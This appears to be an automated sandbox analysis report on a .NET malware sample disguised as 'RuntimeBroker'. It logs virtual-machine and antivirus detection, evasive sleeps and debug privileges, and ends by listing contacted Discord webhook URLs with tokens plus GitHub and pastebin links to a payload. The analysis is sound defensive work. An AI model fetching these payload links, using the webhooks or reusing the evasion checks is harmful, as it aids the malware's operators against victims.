Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Egor\source\repos\WindowsFormsApp32\WindowsFormsApp32\obj\Debug\RuntimeBroker.pdb/ source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Source: Binary string: C:\Users\Egor\source\repos\WindowsFormsApp32\WindowsFormsApp32\obj\Debug\RuntimeBroker.pdb source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe
Binary contains a suspicious time stamp
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Static PE information: 0x816A699B [Thu Oct 21 00:45:15 2038 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_0114E081 push ebp; iretd 0_2_0114DFBB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_0114093D push eax; iretd 0_2_01140985
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Code function: 0_2_0B1441A0 push es; ret 0_2_0B1441B0
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Memory allocated: 1140000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Memory allocated: 2F10000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Memory allocated: 2D60000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Window / User API: threadDelayed 4138 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Window / User API: threadDelayed 2794 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Window / User API: threadDelayed 1362 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe TID: 5040 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe TID: 5040 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe TID: 5040 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystemProduct
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystemProduct
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe File Volume queried: \Device\CdRom0\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Thread delayed: delay time: 100000 Jump to behavior
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Binary or memory string: <IsRunningInVirtualMachine>b__30_0
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Binary or memory string: FMicrosoft.Windows.Runtime.CleanerCore+<IsRunningInVirtualMachine>d__30D
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3994350541.0000000006C70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringComputer System ProductComputer System Product9Z1V3O4D802742-3099-9C0E-C19B-2A23EA1FC420VMware, Inc.NoneTem
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3994350541.0000000006C70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Binary or memory string: vmware
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3994350541.0000000006C70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringComputer System ProductComputer System Product9Z1V3O4D802742-3099-9C0E-C19B-2A23EA1FC420VMware, Inc.None
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Binary or memory string: <IsRunningInVirtualMachine>d__30
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3994350541.0000000006C70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringComputer System ProductComputer System Product9Z1V3O4D802742-3099-9C0E-C19B-2A23EA1FC420VMware, Inc.None+
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3994350541.0000000006C70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: stringComputer System ProductComputer System Product9Z1V3O4D802742-3099-9C0E-C19B-2A23EA1FC420VMware, Inc.None0C1=$[
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Binary or memory string: FMicrosoft.Windows.Runtime.CleanerCore+<IsRunningInVirtualMachine>d__30
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Binary or memory string: IsRunningInVirtualMachine
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3991881938.00000000011E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Enables debug privileges
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Memory allocated: page read and write | page guard Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe, 00000000.00000002.3994350541.0000000006C70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
windows-stand
Behavior
Click here to start
Slideshow Behavior Animation
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1620211 Sample: SecuriteInfo.com.Variant.Ur... Startdate: 20/02/2025 Architecture: WINDOWS Score: 56 9 pastebin.com 2->9 11 raw.githubusercontent.com 2->11 13 2 other IPs or domains 2->13 21 Multi AV Scanner detection for submitted file 2->21 23 Joe Sandbox ML detected suspicious sample 2->23 6 SecuriteInfo.com.Variant.Ursu.753866.7402.26706.exe 15 2 2->6         started        signatures3 25 Connects to a pastebin service (likely for C&C) 9->25 process4 dnsIp5 15 github.com 140.82.121.4, 443, 49710 GITHUBUS United States 6->15 17 raw.githubusercontent.com 185.199.108.133, 443, 49711 FASTLYUS Netherlands 6->17 19 2 other IPs or domains 6->19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.20.3.235
 pastebin.com United States
13335 CLOUDFLARENETUS false
162.159.128.233
 discord.com United States
13335 CLOUDFLARENETUS false
185.199.108.133
 raw.githubusercontent.com Netherlands
54113 FASTLYUS false
140.82.121.4
 github.com United States
36459 GITHUBUS false

Contacted Domains

Name IP Active
discord.com 162.159.128.233 true
github.com 140.82.121.4 true
raw.githubusercontent.com 185.199.108.133 true
pastebin.com 104.20.3.235 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://discord.com/api/webhooks/1339146559857754123/RdvE5BFpIVjJP7fStDbzM9nS9pXbrPaXzwJ6OjTc39Ubv9mEv5-MqpHfZROUd6443n-0 false
    		high
    https://discord.com/api/webhooks/1340319227051249694/Ca6cXCrILucyEp_JrqzaHC37GI4_2qn465cM3N-JDhO-XyQu3UB3MEqzQUGrkhXDTqWw false
      		high
      https://raw.githubusercontent.com/kfocc557/kfocc/refs/heads/main/RuntimeBroker.exe false
        		high
        https://pastebin.com/4LkF0iPK false
          		high
          https://github.com/kfocc557/kfocc/raw/refs/heads/main/RuntimeBroker.exe false
            		high
            https://discord.com/api/webhooks/1338963106465845288/qTNfYWgPgm2ZSMSZqF1vDEfZtK0oGtabcXSnhh4i_ZWqUU6K3gY4im37YsDryhPfXafx false
              		high